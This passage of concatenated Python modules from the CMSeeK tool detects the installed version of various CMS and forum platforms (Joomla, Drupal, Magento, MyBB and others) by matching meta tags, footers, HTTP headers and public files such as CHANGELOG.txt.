53 | slcmsver = slcmsverdetect.start(source) | |
54 | return slcmsver | |
55 | elif id == 'rock': | |
56 | import VersionDetect.rock as rockverdetect | |
57 | rockver = rockverdetect.start(ga_content) | |
58 | return rockver | |
59 | elif id == 'roadz': | |
60 | import VersionDetect.roadz as roadzverdetect | |
61 | roadzver = roadzverdetect.start(ga_content) | |
62 | return roadzver | |
63 | elif id == 'rite': | |
64 | import VersionDetect.rite as riteverdetect | |
65 | ritever = riteverdetect.start(ga_content) | |
66 | return ritever | |
67 | elif id == 'quick': | |
68 | import VersionDetect.quick as quickverdetect | |
69 | quickver = quickverdetect.start(ga_content) | |
70 | return quickver | |
71 | elif id == 'pwind': | |
72 | import VersionDetect.pwind as pwindverdetect | |
73 | pwindver = pwindverdetect.start(ga_content) | |
74 | return pwindver | |
75 | elif id == 'ophal': | |
76 | import VersionDetect.ophal as ophalverdetect | |
77 | ophalver = ophalverdetect.start(ga_content, url, ua) | |
78 | return ophalver | |
79 | elif id == 'sfy': | |
80 | import VersionDetect.sfy as sfyverdetect | |
81 | sfyver = sfyverdetect.start(ga_content) | |
82 | return sfyver | |
83 | elif id == 'otwsm': | |
84 | import VersionDetect.otwsm as otwsmverdetect | |
85 | otwsmver = otwsmverdetect.start(source) | |
86 | return otwsmver | |
87 | elif id == 'ocms': | |
88 | import VersionDetect.ocms as ocmsverdetect | |
89 | ocmsver = ocmsverdetect.start(url, ua) | |
90 | return ocmsver | |
91 | elif id == 'share': | |
92 | import VersionDetect.share as shareverdetect | |
93 | sharever = shareverdetect.start(url, ua) | |
94 | return sharever | |
95 | elif id == 'mura': | |
96 | import VersionDetect.mura as muraverdetect | |
97 | muraver = muraverdetect.start(ga_content) | |
98 | return muraver | |
99 | elif id == 'kbcms': | |
100 | import VersionDetect.kbcms as kbcmsverdetect | |
101 | kbcmsver = kbcmsverdetect.start(url, ua) | |
102 | return kbcmsver | |
103 | elif id == 'koken': | |
104 | import VersionDetect.koken as kokenverdetect | |
105 | kokenver = kokenverdetect.start(ga_content) | |
106 | return kokenver | |
107 | elif id == 'impage': | |
108 | import VersionDetect.impage as impageverdetect | |
109 | impagever = impageverdetect.start(ga_content) | |
110 | return impagever | |
111 | elif id == 'flex': | |
112 | import VersionDetect.flex as flexverdetect | |
113 | flexver = flexverdetect.start(source, url, ua) | |
114 | return flexver | |
115 | elif id == 'dncms': | |
116 | import VersionDetect.dncms as dncmsverdetect | |
117 | dncmsver = dncmsverdetect.start(url, ua) | |
118 | return dncmsver | |
119 | elif id == 'cntsis': | |
120 | import VersionDetect.cntsis as cntsisverdetect | |
121 | cntsisver = cntsisverdetect.start(ga_content) | |
122 | return cntsisver | |
123 | elif id == 'cnido': | |
124 | import VersionDetect.cnido as cnidoverdetect | |
125 | cnidover = cnidoverdetect.start(ga_content) | |
126 | return cnidover | |
127 | elif id == 'con5': | |
128 | import VersionDetect.con5 as con5verdetect | |
129 | con5ver = con5verdetect.start(ga_content) | |
130 | return con5ver | |
131 | elif id == 'csim': | |
132 | import VersionDetect.csim as csimverdetect | |
133 | csimver = csimverdetect.start(ga_content) | |
134 | return csimver | |
135 | elif id == 'brcms': | |
136 | import VersionDetect.brcms as brcmsverdetect | |
137 | brcmsver = brcmsverdetect.start(ga_content) | |
138 | return brcmsver | |
139 | elif id == 'bboard': | |
140 | import VersionDetect.bboard as bboardverdetect | |
141 | bboardver = bboardverdetect.start(source) | |
142 | return bboardver | |
143 | elif id == 'dscrs': | |
144 | import VersionDetect.dscrs as dscrsverdetect | |
145 | dscrsver = dscrsverdetect.start(ga_content) | |
146 | return dscrsver | |
147 | elif id == 'discuz': | |
148 | import VersionDetect.discuz as discuzverdetect | |
149 | discuzver = discuzverdetect.start(ga_content) | |
150 | return discuzver | |
151 | elif id == 'minibb': | |
152 | import VersionDetect.minibb as minibbverdetect | |
153 | minibbver = minibbverdetect.start(source) | |
154 | return minibbver | |
155 | elif id == 'mybb': | |
156 | import VersionDetect.mybb as mybbverdetect | |
157 | mybbver = mybbverdetect.start(source) | |
158 | return mybbver | |
159 | elif id == 'nodebb': | |
160 | import VersionDetect.nodebb as nodebbverdetect | |
161 | nodebbver = nodebbverdetect.start(source) | |
162 | return nodebbver | |
163 | elif id == 'punbb': | |
164 | import VersionDetect.punbb as punbbverdetect | |
165 | punbbver = punbbverdetect.start(source) | |
166 | return punbbver | |
167 | elif id == 'smf': | |
168 | import VersionDetect.smf as smfverdetect | |
169 | smfver = smfverdetect.start(source) | |
170 | return smfver | |
171 | elif id == 'vanilla': | |
172 | import VersionDetect.vanilla as vanillaverdetect | |
173 | vanillaver = vanillaverdetect.start(url, ua) | |
174 | return vanillaver | |
175 | elif id == 'uknva': | |
176 | import VersionDetect.uknva as uknvaverdetect | |
177 | uknvaver = uknvaverdetect.start(ga_content) | |
178 | return uknvaver | |
179 | elif id == 'xmb': | |
180 | import VersionDetect.xmb as xmbverdetect | |
181 | xmbver = xmbverdetect.start(source) | |
182 | return xmbver | |
183 | elif id == 'yabb': | |
184 | import VersionDetect.yabb as yabbverdetect | |
185 | yabbver = yabbverdetect.start(source) | |
186 | return yabbver | |
187 | elif id == 'aef': | |
188 | import VersionDetect.aef as aefverdetect | |
189 | aefver = aefverdetect.start(source) | |
190 | return aefver | |
191 | elif id == 'bhf': | |
192 | import VersionDetect.bhf as bhfverdetect | |
193 | bhfver = bhfverdetect.start(ga_content) | |
194 | return bhfver | |
195 | elif id == 'fudf': | |
196 | import VersionDetect.fudf as fudfverdetect | |
197 | fudfver = fudfverdetect.start(source) | |
198 | return fudfver | |
199 | elif id == 'yaf': | |
200 | import VersionDetect.yaf as yafverdetect | |
201 | yafver = yafverdetect.start(source) | |
202 | return yafver | |
203 | elif id == 'ubbt': | |
204 | import VersionDetect.ubbt as ubbtverdetect | |
205 | ubbtver = ubbtverdetect.start(source, ga_content) | |
206 | return ubbtver | |
207 | elif id == 'myupb': | |
208 | import VersionDetect.myupb as myupbverdetect | |
209 | myupbver = myupbverdetect.start(source) | |
210 | return myupbver | |
211 | elif id == 'mvnf': | |
212 | import VersionDetect.mvnf as mvnfverdetect | |
213 | mvnfver = mvnfverdetect.start(source) | |
214 | return mvnfver | |
215 | elif id == 'mcb': | |
216 | import VersionDetect.mcb as mcbverdetect | |
217 | mcbver = mcbverdetect.start(source) | |
218 | return mcbver | |
219 | elif id == 'aspf': | |
220 | import VersionDetect.aspf as aspfverdetect | |
221 | aspfver = aspfverdetect.start(source) | |
222 | return aspfver | |
223 | elif id == 'jf': | |
224 | import VersionDetect.jf as jfverdetect | |
225 | jfver = jfverdetect.start(source) | |
226 | return jfver | |
227 | elif id == 'mg': | |
228 | import VersionDetect.mg as mgverdetect | |
229 | mgver = mgverdetect.start(url, ua) | |
230 | return mgver | |
231 | elif id == 'coms': | |
232 | import VersionDetect.coms as comsverdetect | |
233 | comsver = comsverdetect.start(url, ua) | |
234 | return comsver | |
235 | elif id == 'abda': | |
236 | import VersionDetect.abda as abdaverdetect | |
237 | abdaver = abdaverdetect.start(source) | |
238 | return abdaver | |
239 | elif id == 'dweb': | |
240 | import VersionDetect.dweb as dwebverdetect | |
241 | dwebver = dwebverdetect.start(ga_content) | |
242 | return dwebver | |
243 | elif id == 'qcart': | |
244 | import VersionDetect.qcart as qcartverdetect | |
245 | qcartver = qcartverdetect.start(ga_content) | |
246 | return qcartver | |
247 | elif id == 'rbsc': | |
248 | import VersionDetect.rbsc as rbscverdetect | |
249 | rbscver = rbscverdetect.start(ga_content) | |
250 | return rbscver | |
251 | elif id == 'oracle_atg': | |
252 | import VersionDetect.atg as atgverdetect | |
253 | atgver = atgverdetect.start(headers) | |
254 | return atgver | |
255 | elif id == 'umbraco': | |
256 | import VersionDetect.umbraco as umbracoverdetect | |
257 | umbracover = umbracoverdetect.start(headers, url, ua) | |
258 | return umbracover | |
259 | elif id == 'shopfa': | |
260 | import VersionDetect.shopfa as shopfaverdetect | |
261 | shopfaver = shopfaverdetect.start(ga_content, headers) | |
262 | return shopfaver | |
263 | elif id == 'amiro': | |
264 | import VersionDetect.amiro as amiroverdetect | |
265 | amirover = amiroverdetect.start(source) | |
266 | return amirover | |
267 | elif id == 'godaddywb': | |
268 | import VersionDetect.godaddywb as godaddywbverdetect | |
269 | godaddywb_version = godaddywbverdetect.start(ga_content) | |
270 | return godaddywb_version |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Discuz! version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'discuz! (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('Discuz! version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Danneo CMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(url, ua): | |
12 | kurama = cmseek.getsource(url, ua) | |
13 | header = kurama[2].split('\n') | |
14 | regex = [] | |
15 | for tail in header: | |
16 | if 'X-Powered-By: CMS Danneo' in tail: | |
17 | regex = re.findall(r'X-Powered-By: CMS Danneo (.*)', tail) | |
18 | if regex != []: | |
19 | cmseek.success('Danneo CMS version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
20 | return regex[0] | |
21 | else: | |
22 | cmseek.error('Version detection failed!') | |
23 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Drupal version detection | |
6 | # Rev 1 | |
7 | import cmseekdb.basic as cmseek | |
8 | import re | |
9 | def start(id, url, ua, ga, source): | |
10 | if ga == '1': | |
11 | # well for now we only have one way of detecting the version - Not any more! | |
12 | cmseek.statement('Detecting version using generator meta tag [Method 1 of 2]') | |
13 | regex = re.findall(r'<meta name="Generator" content="Drupal (.*?) \(http(s|):\/\/(www\.|)drupal.org\)"', source) | |
14 | if regex != []: | |
15 | cmseek.success('Drupal version ' + cmseek.bold + regex[0][0] + cmseek.cln + ' detected') | |
16 | return regex[0][0] | |
17 | else: | |
18 | # Detect version via CHANGELOG.txt (not very accurate) | |
19 | cmseek.statement('Detecting version using CHANGELOG.txt [Method 2 of 2]') | |
20 | changelog = url + '/CHANGELOG.txt' | |
21 | changelog_source = cmseek.getsource(changelog, ua) | |
22 | if changelog_source[0] == '1' and 'Drupal' in changelog_source[1]: | |
23 | cl_array = changelog_source[1].split('\n') | |
24 | for line in cl_array: | |
25 | match = re.findall(r'Drupal (.*?),', line) | |
26 | if match != []: | |
27 | cmseek.success('Drupal version ' + cmseek.bold + match[0] + cmseek.cln + ' detected') | |
28 | return match[0] | |
29 | cmseek.error('Drupal version detection failed!') | |
30 | return '0' | |
31 | else: | |
32 | cmseek.error('Drupal version detection failed!') | |
33 | return '0' | |
34 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Discourse version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'discourse (.*?) ', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('Discourse version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Dynamicweb version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | cmseek.statement('Detecting Dynamicweb version using generator meta tag [Method 1 of 1]') | |
13 | regex = re.findall(r'Dynamicweb (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('Dynamicweb version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # FlexCMP version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source, url, ua): | |
12 | regex = re.findall(r'<!--.*-->', source, re.DOTALL) | |
13 | if regex != []: | |
14 | for r in regex: | |
15 | if 'FlexCMP' in r and 'v.' in r: | |
16 | tmp = r.split('\n') | |
17 | for t in tmp: | |
18 | if 'v.' in t: | |
19 | kek = re.findall(r'v. (.*?) -', t) | |
20 | if kek != []: | |
21 | # coding this was actually fun idk why ;--; | |
22 | version = kek[0] | |
23 | cmseek.success('FlexCMP version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected from source') | |
24 | return version | |
25 | else: | |
26 | kurama = cmseek.getsource(url, ua) | |
27 | header = kurama[2].split('\n') | |
28 | regex = [] | |
29 | for tail in header: | |
30 | if 'X-Powered-By' in tail and 'FlexCMP' in tail: | |
31 | regex = re.findall(r'X-Powered-By: FlexCMP Application Server \[v\. (.*?) - ', tail) | |
32 | if regex != []: | |
33 | cmseek.success('FlexCMP version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected from header') | |
34 | return regex[0] | |
35 | else: | |
36 | cmseek.error('Version detection failed!') | |
37 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # FUDforum version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'Powered by: FUDforum (\d.*?).<', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0] | |
16 | cmseek.success('FUDforum version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # GoDaddy Website Builder version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | cmseek.statement('Detecting GoDaddy Website Builder version using generator meta tag [Method 1 of 1]') | |
13 | regex = re.findall(r'Go Daddy Website Builder (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('GoDaddy Website Builder version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # ImpressPages CMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'impresspages cms (.*?) under', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('ImpressPages version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # JForum version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.search(r'Powered by(.*?)JForum (\d.*?)</a>', source) | |
13 | if regex != None: | |
14 | try: | |
15 | version = regex.group(2) | |
16 | cmseek.success('JForum version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | except Exception as e: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' | |
21 | ||
22 | cmseek.error('Version detection failed!') | |
23 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | ## Joomla version detection | |
6 | ## Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | def start(id, url, ua, ga, source): | |
11 | version = '0' | |
12 | cmseek.info('detecting joomla version') | |
13 | ||
14 | # version detection stats here | |
15 | if ga == '1': | |
16 | # Detect version via generator meta tag | |
17 | cmseek.statement('Detecting version using generator meta tag [Method 1 of 4]') | |
18 | regex_1 = re.findall(r'content=(?:\"|\')Joomla! (.*?) - Open Source Content Management(?:\"|\')', source) | |
19 | if regex_1 != []: | |
20 | cmseek.success('Joomla version detected, version: ' + cmseek.bold + regex_1[0] + cmseek.cln) | |
21 | return regex_1[0] | |
22 | ||
23 | if version == '0': | |
24 | # Detections using the xml files | |
25 | xml_files = ['administrator/manifests/files/joomla.xml','language/en-GB/en-GB.xml','administrator/components/com_content/content.xml','administrator/components/com_plugins/plugins.xml','administrator/components/com_media/media.xml','mambots/content/moscode.xml'] | |
26 | cmseek.statement('Detecting version using xml files [Method 2 of 4]') | |
27 | for xml_file in xml_files: | |
28 | xml_source = cmseek.getsource(url + '/' + xml_file, ua) | |
29 | if xml_source[0] == '1': | |
30 | regex_2 = re.findall(r'<version>(.*?)</version>', xml_source[1]) | |
31 | if regex_2 != []: | |
32 | cmseek.success('Joomla version detected, version: ' + cmseek.bold + regex_2[0] + cmseek.cln) | |
33 | return regex_2[0] | |
34 | ||
35 | # Detection method 3 | |
36 | if version == '0': | |
37 | other_files = ['language/en-GB/en-GB.xml','templates/system/css/system.css','media/system/js/mootools-more.js','language/en-GB/en-GB.ini','htaccess.txt','language/en-GB/en-GB.com_media.ini'] | |
38 | cmseek.statement('Detecting version using advanced fingerprinting [Method 3 of 4]') | |
39 | for file in other_files: | |
40 | file_source = cmseek.getsource(url + '/' + file, ua) | |
41 | if file_source[0] == '1': | |
42 | # Regex find | |
43 | regex_3 = re.findall(r'<meta name="Keywords" content="(.*?)">', file_source[1]) | |
44 | if regex_3 != []: | |
45 | cmseek.success('Joomla version detected, version: ' + cmseek.bold + regex_3[0] + cmseek.cln) | |
46 | return regex_3[0] | |
47 | ||
48 | # Joomla version 1.6 | |
49 | j16 = ['system.css 20196 2011-01-09 02:40:25Z ian','MooTools.More={version:"1.3.0.1"','en-GB.ini 20196 2011-01-09 02:40:25Z ian','en-GB.ini 20990 2011-03-18 16:42:30Z infograf768','20196 2011-01-09 02:40:25Z ian'] | |
50 | for j in j16: | |
51 | rsearch = re.search(j,file_source[1]) | |
52 | if rsearch is not None: | |
53 | cmseek.success('Joomla version detected, version: ' + cmseek.bold + '1.6' + cmseek.cln) | |
54 | return '1.6' | |
55 | ||
56 | # Joomla version 1.5 | |
57 | j15 = ['Joomla! 1.5','MooTools={version:\'1.12\'}','11391 2009-01-04 13:35:50Z ian'] | |
58 | for j in j15: | |
59 | rsearch = re.search(j,file_source[1]) | |
60 | if rsearch is not None: | |
61 | cmseek.success('Joomla version detected, version: ' + cmseek.bold + '1.5' + cmseek.cln) | |
62 | return '1.5' | |
63 | ||
64 | # Joomla version 1.7 | |
65 | j17 = ['system.css 21322 2011-05-11 01:10:29Z dextercowley','MooTools.More={version:"1.3.2.1"','22183 2011-09-30 09:04:32Z infograf768','21660 2011-06-23 13:25:32Z infograf768'] | |
66 | for j in j17: | |
67 | rsearch = re.search(j,file_source[1]) | |
68 | if rsearch is not None: | |
69 | cmseek.success('Joomla version detected, version: ' + cmseek.bold + '1.7' + cmseek.cln) | |
70 | return '1.7' | |
71 | ||
72 | # Joomla version 1.0 | |
73 | j10 = ['(Copyright (C) 2005 - 200(6|7))','47 2005-09-15 02:55:27Z rhuk','423 2005-10-09 18:23:50Z stingrey','1005 2005-11-13 17:33:59Z stingrey','1570 2005-12-29 05:53:33Z eddieajau','2368 2006-02-14 17:40:02Z stingrey','1570 2005-12-29 05:53:33Z eddieajau','4085 2006-06-21 16:03:54Z stingrey','4756 2006-08-25 16:07:11Z stingrey','5973 2006-12-11 01:26:33Z robs','5975 2006-12-11 01:26:33Z robs'] | |
74 | for j in j10: | |
75 | rsearch = re.search(j,file_source[1]) | |
76 | if rsearch is not None: | |
77 | cmseek.success('Joomla version detected, version: ' + cmseek.bold + '1.0' + cmseek.cln) | |
78 | return '1.0' | |
79 | ||
80 | # Joomla version 2.5 | |
81 | j25 = ['Copyright (C) 2005 - 2012 Open Source Matters','MooTools.More={version:"1.4.0.1"'] | |
82 | for j in j25: | |
83 | rsearch = re.search(j,file_source[1]) | |
84 | if rsearch is not None: | |
85 | cmseek.success('Joomla version detected, version: ' + cmseek.bold + '2.5' + cmseek.cln) | |
86 | return '2.5' | |
87 | ||
88 | # Detection using README file | |
89 | if version == '0': | |
90 | cmseek.statement('Detecting version from README file [Method 4 of 4]') | |
91 | readme_file = url + '/README.txt' | |
92 | readme_source = cmseek.getsource(readme_file, ua) | |
93 | if readme_source[0] == '1': | |
94 | regex_4 = re.findall(r'package to version (.*?)', readme_source[1]) | |
95 | if regex_4 != []: | |
96 | cmseek.success('Joomla version detected, version: ' + cmseek.bold + regex_4[0] + cmseek.cln) | |
97 | return regex_4[0] | |
98 | ||
99 | # if we fail ¯\_(ツ)_/¯ | |
100 | return version |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # KoobooCMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(url, ua): | |
12 | kurama = cmseek.getsource(url, ua) | |
13 | header = kurama[2].split('\n') | |
14 | regex = [] | |
15 | for tail in header: | |
16 | if 'X-KoobooCMS-Version' in tail: | |
17 | regex = re.findall(r'X-KoobooCMS-Version: (.*)', tail) | |
18 | if regex != []: | |
19 | cmseek.success('Kooboo CMS version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
20 | return regex[0] | |
21 | else: | |
22 | cmseek.error('Version detection failed!') | |
23 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Koken version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'koken (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('Koken version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # MercuryBoard version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.search(r'MercuryBoard(.*?)\[v(\d.*?)\]', source) | |
13 | if regex != None: | |
14 | try: | |
15 | version = regex.group(2) | |
16 | cmseek.success('MercuryBoard version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | except Exception as e: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' | |
21 | ||
22 | cmseek.error('Version detection failed!') | |
23 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Magento version detection | |
6 | # Rev 1 | |
7 | import cmseekdb.basic as cmseek | |
8 | import re | |
9 | def start(url, ua): | |
10 | # Detect version via magento_version (not very accurate) | |
11 | cmseek.statement('Detecting version using magento_version [Method 1 of 1]') | |
12 | magento_version = url + '/magento_version' | |
13 | changelog_source = cmseek.getsource(magento_version, ua) | |
14 | if changelog_source[0] == '1' and 'Magento' in changelog_source[1]: | |
15 | cl_array = changelog_source[1].split('/') | |
16 | if cl_array != []: | |
17 | cmseek.success('Magento version ' + cmseek.bold + cl_array[1] + cmseek.cln + ' detected') | |
18 | return cl_array[1] | |
19 | cmseek.error('Magento version detection failed!') | |
20 | return '0' | |
21 | else: | |
22 | cmseek.error('Magento version detection failed!') | |
23 | return '0'⏎ |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # miniBB version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'>miniBB (\d.*?)</a>', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0] | |
16 | cmseek.success('miniBB version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Mura CMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | regex = re.findall(r'Mura CMS (.*)', ga_content) | |
13 | if regex != []: | |
14 | version = regex[0] | |
15 | cmseek.success('Mura CMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
16 | return version | |
17 | else: | |
18 | cmseek.error('Version detection failed!') | |
19 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # mvnForum version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.search(r'Powered by(.*?)mvnForum (\d.*?)<\/a>', source) | |
13 | if regex != None: | |
14 | try: | |
15 | version = regex.group(2) | |
16 | cmseek.success('mvnForum version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | except Exception as e: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' | |
21 | ||
22 | ||
23 | cmseek.error('Version detection failed!') | |
24 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # MyBB version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'>MyBB (\d.*?)</a>', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0] | |
16 | cmseek.success('MyBB version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # myUPB version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
